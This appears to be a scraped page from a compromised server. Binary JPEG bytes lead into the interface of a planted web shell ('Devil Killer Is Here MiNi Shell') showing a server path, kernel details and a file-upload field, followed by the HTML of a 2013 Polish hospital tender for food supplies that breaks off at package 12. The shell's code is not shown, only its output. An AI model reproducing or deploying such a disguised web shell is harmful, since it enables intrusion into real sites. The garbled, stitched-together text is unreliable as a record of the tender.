JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130510/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130510/185282-N-2013.html

<p class="kh_header"><b>Sosnowiec: Dostawa artykułów spożywczych, wody mineralnej, napojów</b><br>
<b>Numer ogłoszenia: 185282 - 2013; data zamieszczenia: 10.05.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Szpital Miejski w Sosnowcu , ul. Szpitalna 1, 41-219 Sosnowiec, woj. śląskie, tel. 32 41 30 111, faks 32 41 30 112.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital.sosnowiec.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów spożywczych, wody mineralnej, napojów.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamówienie składa się z 29 pakietów, z których każdy stanowi odrębny przedmiot zamówienia. 
Dopuszcza się składanie ofert na każdy pakiet odrębnie.
Pakiet nr 1 - Makarony 
Pakiet nr 2 - Przyprawy - CPV: 15870000-7 
Pakiet nr 3 - Kasze -  CPV: 15613000-8;
Pakiet nr 4 - Mąka -  CPV: 15612100-2; 
Pakiet nr 5 - Pieczywo dietetyczne paczkowane - CPV 15820000-2; 
Pakiet nr 6 - Warzywa strączkowe suche - CPV 03212210-5; 
Pakiet nr 7 - Ryby, przetwory rybne - CPV 15220000-6; 
Pakiet nr 8 - Wyroby cukiernicze pieczone - CPV 15812000-3; 
Pakiet nr 9 - Galanteria mleczarska I - CPV 15.50.00.00-3; 
Pakiet nr 10 - Galanteria mleczarska - bar - CPV 15.50.00.00-3; 
Pakiet nr 11 - Tłuszcze roślinne - CPV 15.40.00.00-2
Pakiet nr 12 - Jaja spożywcze - CPV 03.14.25.00-3
Pakiet nr 13 - Pieczywo zwykłe - CPV 15612500-6; 
Pakiet nr 14 - Wędliny, mięso - CPV 15131130-5, 15119000-5; 
Pakiet nr 15 - Lody - CPV 15.55.50.00-3; 
Pakiet nr 16 - Obwarzanki -15612500-6; 
Pakiet nr 17 - Mrożonki - kod CPV: 15896000-5; 
Pakiet nr 18 - Żurek -CPV: 15800000-6;
Pakiet nr 19 - Wędliny paczkowane - CPV 15131130-5; 
Pakiet nr 20 - Przetwory warzywne -CPV: 15897200-4,  15800000-6; 
Pakiet nr 21 - Artykuły sypkie -CPV: 15800000-6; 
Pakiet nr 22 - Herbata -CPV: 15863000-5; 
Pakiet nr 23 - Warzywa różne -CPV: 15331140-0; 
Pakiet nr 24 - Ziemniaki - kod CPV: 15310000-4; 
Pakiet nr 25 - Drób - CPV 15112100-7; 
Pakiet nr 26 - Wyroby garmażeryjne gotowe - CPV 15130000-8; 
Pakiet nr 27 - Pieczywo -bar - CPV 15810000-9; 
Pakiet nr 28 - Wody mineralne, napoje - kod CPV: 15981000-8, 15981400-2
Pakiet nr 29 - Wody mineralne typu Jurajska, napoje- kod CPV: 15981000-8;
                         15981400-2,.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.81.00.00-9, 15.98.10.00-8, 15.13.00.00-8, 15.31.00.00-4, 15.61.30.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 29.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 3.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.1.  oświadczenie, według załącznika nr 2 do SIWZ,
1.2. aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy,
Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej  stosuje się odpowiednio  § 4 Rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2009 roku w sprawie rodzajów dokumentów, jakich może żądać Zamawiający od Wykonawcy oraz form, w jakich te dokumenty mogą być składane (Dz.U. z 2009r. Nr 226, poz. 1817).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie, według załącznika nr 2 do SIWZ,</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie, według załącznika nr 2 do SIWZ,</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie, według załącznika nr 2 do SIWZ,</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie, według załącznika nr 2 do SIWZ,</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">4. Wymagania dotyczące zamówienia:
4.1	Wykonawca zobligowany jest do przestrzegania ustawy z dnia 25 sierpnia 2006r. 
o bezpieczeństwie żywności i żywienia (tj. Dz. U. z 2010, Nr 136, poz. 914);
4.2 Wykonawca zobowiązany jest do sukcesywnej dostawy przedmiotu zamówienia wraz z rozładunkiem do wskazanych obiektów szpitalnych tj. przy ul. Szpitalnej 1 i/lub ul. Zegadłowicza3, zgodnie z wyborem Zamawiającego, ściśle wg zamówień telefonicznych;
4.3 Środek transportu dopuszczony do przewozu art. żywnościowych przez Państwową Inspekcję Sanitarną;
4.4 Wszystkie dostawy odbywać się będą na koszt Wykonawcy;
4.5 Oznakowania artykułów żywnościowych, zgodne z dyrektywami Unii Europejskiej i wytycznymi Kodeksu Żywnościowego obowiązującego w Europie:
- nazwa środka spożywczego,
- data minimalnej trwałości lub termin przydatności do spożycia,
- zawartość netto lub liczbę sztuk w opakowaniu,
- warunki przechowywania - przy znakowaniu terminem przydatności do spożycia oraz w przypadku, gdy jakość środka spożywczego w istotny sposób zależy od warunków jego przechowywania,
-  nazwę i adres producenta,
- dane wprowadzające środek spożywczy do obrotu w kraju,
-  kraj w którym wyprodukowano środek spożywczy,	
- klasę jakości handlowej lub inny wyróżnik jakości handlowej o ile określono klasyfikację jakościową,
- oznakowanie partii produkcyjnej umożliwiającej identyfikację środka spożywczego.</p></li>



</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>4.	Wartość o której mowa w ust. 1 może ulec zmianie w przypadku ustawowej zmiany stawki podatku VAT lub w przypadku korzystnych zmian cenowych dla Zamawiającego.
5.	Wynagrodzenie należne Wykonawcy podlega automatycznej waloryzacji (bez obowiązku wprowadzenia aneksem) odpowiednio o kwotę podatku VAT, wynikającą ze stawki tego podatku, obowiązującą w chwili powstania obowiązku podatkowego. 
6.	Strony zastrzegają prawo do negocjacji cen jednostkowych w przypadku konieczności zapłaty Wykonawcy ceny wyższej, będącej wynikiem zmiany stawki podatku VAT.
4.	Dopuszcza się zmiany ilości asortymentu określonego w załączniku do umowy - formularzu asortymentowo-cenowym, w obrębie poszczególnych pakietów, przy zachowaniu cen jednostkowych zgodnych z ofertą Wykonawcy oraz wartości brutto danego pakietu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpital.sosnowiec.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> : Samodzielny Publiczny Szpital Miejski w Sosnowcu, ul. Szpitalna 1, Dział Zamówień Publicznych.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.05.2013 godzina 11:00, miejsce: Samodzielny Publiczny Szpital Miejski w Sosnowcu, ul. Szpitalna 1, III p. Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pakiet nr 1 Makarony.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Makaron wyborowy grube formy 	kg		650,0
2	Makaron zwykły formy średnie			50,0
3	Makaron nitka cienka			100,0
4	Makaron zacierka			50,0
5	Makaron łazanka			100,0.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.61.30.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pakiet nr 2 Przyprawy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Sól warzona biała	kg		475,0
2	Pieprz prawdziwy czarny mielony	kg		3,0
3	Kwasek cytrynowy	kg		4,0
4	Ziele angielskie	kg		0,8
5	Majeranek	kg		1,3
6	Liść laurowy	kg		0,5
7	Kminek	kg		0,3
8	Czosnek granulowany	kg		0,4
9	Papryka słodka moielona	kg		0,8
10	Delikat przyprawa do mięsa	kg		0,3
11	Przyprawa do ryb	kg		0,4
12	Delikat przyprawa do drobiu 25g	szt.		13
13	Przyprawa do bigosu 20g	szt.		8
14	Przyprawa do potraw Kucharek	kg		45,0
15	Przyprawa w płynie opak. 1 ÷ 5 l	L		175,0
16	Ocet spirytusowy 6% - 10% 0,5 l but.	szt.		10
17	Przyprawa do flaków 20g	szt.		8
18	Przyprawa do fasoli 20g	szt.		13
19	Oregano	kg		1,0
20	Żelatyna spożywcza opak. 50g	szt.		8
21	Przyprawa do piernika opak. 40g	szt.		8
22	Soda oczyszczona opak. 50g	szt.		8
23	Przyprawa Gyros 30g	szt.		20
24	Cynamon 20g	szt.		13
25	Goździki opak. 10g	szt.		8
26	Koper suszony 25g	szt.		25
27	Zupa typu Vifon 60g różne smaki	szt.		18.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.61.30.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pakiet nr 3 Kasze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Ryż	kg		750,0
2	Kasza jęczmienna średnia			230,0
3	Kasza manna			500,0
4	Płatki owsiane			190,0
5	Płatki jęczmienne			190,0
15613000-8;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.61.30.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Pakiet nr 4 Mąka.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Mąka pszenna typ 500	kg		750,0
2	Mąka tortowa typ 450	kg		25,0.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.61.21.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Pakiet nr 5 Pieczywo dietetyczne paczkowane.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Suchary wyborowe 300g	szt.		25
2	Suchary bc 285g	szt.		3
3	Biszkopty 120g	szt.		38
4	Pieczywo ryżowe typu GRANEX 100g zwykłe (bez glutenu)	szt.		20.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.82.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Pakiet nr 6 Warzywa strączkowe suche.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Fasola Jaś	kg		62,0
2	Fasola drobna jednolita	kg		37,0
3	Groch omielany	kg		62,0
03212210-5.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.21.22.10-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Pakiet nr 7 Ryby, przetwory rybne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Filet z ryby - morszczuk mrożony SHP kl. I	kg		150,0
2	Śledzie solone typu Matias 5kg	kg		20,0.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.22.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Pakiet nr 8 Wyroby cukiernicze pieczone.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Ciastka deserowe różne nie mniej niż 90g	szt.		650
2	Ciastka drobne nadziewane typu eklerki, ptysie itp..	kg		28
3	Ciasta różne	kg		25
4	Bułki słodkie różne nie mniej niż 100g	szt.		5500.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.20.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Pakiet nr 9 Galanteria mleczarska I.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Ser podpuszczkowy twardy  żółty  tłusty typu Gouda	kg		63,0
2	Serek topiony 100g różne smaki	szt.		25
3	Serek topiony 50g różne smaki	szt.		80
4	Serek fromage różne smaki 100g	szt.		80
5	Serek fromage typu Górski przysmak szczypiorkowy, ziołowy, naturalny 80g	szt.		80
6	Serek homogenizowany naturalny b/c półtłusty pak. ~130÷135g	szt.		300
7	Serek homogenizowany owocowy półtłusty pak. ~130÷135g	szt.		400
8	Kefir 2% Luks. ~200g	szt.		50
9	Jogurt naturalny probiotyczny b/c ~200g	szt.		250
10	Jogurt owocowy ~200g	szt.		400.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Pakiet nr 10 Galanteria mleczarska - bar.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Ser podpuszczkowy twardy (żółty) porcjowany pak. Folia ~ 150g	szt.		75
2	Serek topiony ~ 17,5g	szt.		300
3	Serek topiony tylżycki ~ 100g	szt.		75
4	Serek topiony z borowików ~100g	szt.		90
5	Serek topiony szynka ~100g	szt.		90
6	Serek topiony słonecznik ~100g	szt.		50
7	Serek topiony szczypiorek ~100g	szt.		90
8	Serek topiony Złoty Ement. ~100g	szt.		115
9	Serek topiony warzywa ~ 100g 	szt.		90
10	Serek topiony Hochland ~200g	szt.		175
11	Serek topiony plastry ~150g	szt.		25
12	Masło Lurpak ~10g 82% tłuszczu	szt.		600
13	Masło Lactime ~ 10g	szt.		600
14	Ser topiony tosty 150g	szt.		25
15	Serek homogenizowany naturalny półtłusty pak. ~ 150g	szt.		50
16	Serek homogenizowany owocowy półtłusty pak. ~150g	szt.		625
17	Serek Jogobella ~150g	szt.		125
18	Homo Danio serek ~140g	szt.		175
19	Krem Fantazja owoc. kącik ~106÷130g	szt.		25
20	Homo Wanilia serek ~150g	szt.		135
21	Serek Bieluch~150g	szt.		225
22	Serek do chleba ~100g: naturalny i różne smaki            	szt.		250
23	Serek wiejski  ~200g  	szt.		225
24	Śmietanka do kawy Łowicz ~10g 	szt.		1250
25	Mleko zagęszczone niesłodzone GOSTYŃ ~200g	szt.		300
26	Mleko zagęszczone niesłodzone ~350g	szt.		250
27	Mleko Łaciate UHT 2% 0.5 l 	szt.		75
28	Mleko Łaciate UHT 3,2% 0.5 l	szt.		75
29	Mleko Łaciate UHT 2% 1 l	szt.		25
30	Mleko Łaciate UHT 3,2% 1 l	szt.		25
31	Kefir ~250g 2% Luks.	szt.		115
32	Kefir ~400g 2% Luks.	szt.		15
33	Jogurt naturalny b/c ~180g	szt.		250
34	Jogurt naturalny ~400g 	szt.		15
35	Jogobella jogurt owocowy ~150g 	szt.		250
36	Jogurt z musli ~150g 	szt.		90
37	Maślanka naturalna KRASNYSTAW ~400g	szt.		22
38	Maślanka owocowa KRASNYSTAW ~400g	szt.		25
39	Jogurt Jogobella zboża ~180g	szt.		125
40	Jogurt Jogobella do picia ~330g	szt.		75
41	Jogurt Actimel ~100g	szt.		100
42	Jogurt Activia ~115g	szt.		90
43	Jogurt owocowy 0 ~350g	szt.		40
44	Jogurt Activia ~200g butelka	szt.		12
45	Kaszka smakija mix ~130g	szt.		50
46	Deser Berlisso mix ~180g	szt.		50
47	Jogurt Krasnystaw wapń ~175g	szt.		375
48	Jogurt Jogobella light mix 150g	szt.		375
49	Sałatki Lisner 150g różne	szt.		600
50	Pasta Pastella Lsner 80g	szt.		150
15.50.00.00-3;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Pakiet nr 11 Tłuszcze roślinne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Margaryna mleczna w blokach	kg		190,0
2	Olej uniwersalny poj. 1 l	L		215,0.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.40.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Pakiet nr 12 Jajka spożywcze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Jaja spożywcze średnie  (55-60g) kl. I	Szt.		7500.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.14.25.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
